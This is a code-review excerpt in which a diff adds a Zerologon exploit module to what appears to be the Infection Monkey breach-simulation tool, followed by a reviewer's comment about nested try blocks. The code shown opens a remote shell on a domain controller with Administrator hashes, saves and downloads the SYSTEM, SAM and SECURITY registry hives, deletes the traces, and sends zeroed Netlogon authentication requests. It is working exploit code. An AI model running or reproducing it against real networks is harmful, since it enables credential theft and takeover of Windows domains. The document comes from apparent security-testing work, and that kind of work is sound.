monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,365 @@
+        LOG.debug("Starting remote shell on victim.")
+
+        wmiexec = Wmiexec(ip=self.dc_ip,
+                          username='Administrator',
+                          hashes=admin_pwd_hashes,
+                          domain=self.dc_ip)
+
+        remote_shell = wmiexec.get_remote_shell()
+        if remote_shell:
+            _orig_stdout = sys.stdout
+            _new_stdout = io.StringIO()
+            sys.stdout = _new_stdout
+
+            try:
+                # Save HKLM keys on victim.
+                remote_shell.onecmd('reg save HKLM\\SYSTEM system.save && ' +
+                                    'reg save HKLM\\SAM sam.save && ' +
+                                    'reg save HKLM\\SECURITY security.save')
+
+                # Get HKLM keys locally (can't run these together because it needs to call do_get()).
+                remote_shell.onecmd('get system.save')
+                remote_shell.onecmd('get sam.save')
+                remote_shell.onecmd('get security.save')
+
+                # Delete saved keys on victim.
+                remote_shell.onecmd(
+                    'del /f system.save sam.save security.save')
+
+                wmiexec.close()
+
+                return True
+
+            except Exception as e:
+                LOG.info(f"Exception occured: {str(e)}")
+
+            finally:
+                sys.stdout = _orig_stdout
+                _new_stdout.seek(0)
+                info = _new_stdout.read()
+
+                LOG.debug(f"Getting victim HKLM keys via remote shell: {info}")
+
+        else:
+            raise Exception("Could not start remote shell on DC.")
+
+        return False
+
+    def attempt_restoration(self, original_pwd_nthash: str) -> Optional[object]:
+        # Connect to the DC's Netlogon service.
+        try:
+            rpc_con = self.connect_to_dc()
+        except Exception as e:
+            LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
+            return
+
+        plaintext = b'\x00'*8
+        ciphertext = b'\x00'*8
+        flags = 0x212fffff
+
+        # Send challenge and authentication request.
+        server_challenge_response = nrpc.hNetrServerReqChallenge(rpc_con, self.dc_handle + '\x00',
+                                                                 self.dc_name + '\x00', plaintext)
+        server_challenge = server_challenge_response['ServerChallenge']
+
+        try:
+            server_auth = nrpc.hNetrServerAuthenticate3(
+                rpc_con, self.dc_handle + '\x00', self.dc_name + '$\x00',
+                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+                self.dc_name + '\x00', ciphertext, flags
+            )
+
+            assert server_auth['ErrorCode'] == 0
+            session_key = nrpc.ComputeSessionKeyAES(None, b'\x00'*8, server_challenge,
+                                                    unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
+
+            try:
```

Comment:
Nested `try` blocks shouldn't be a thing in a good codebase. Lets split these into `establish_nrpc_session` and `send_password_restore_packet`

Reply:
todo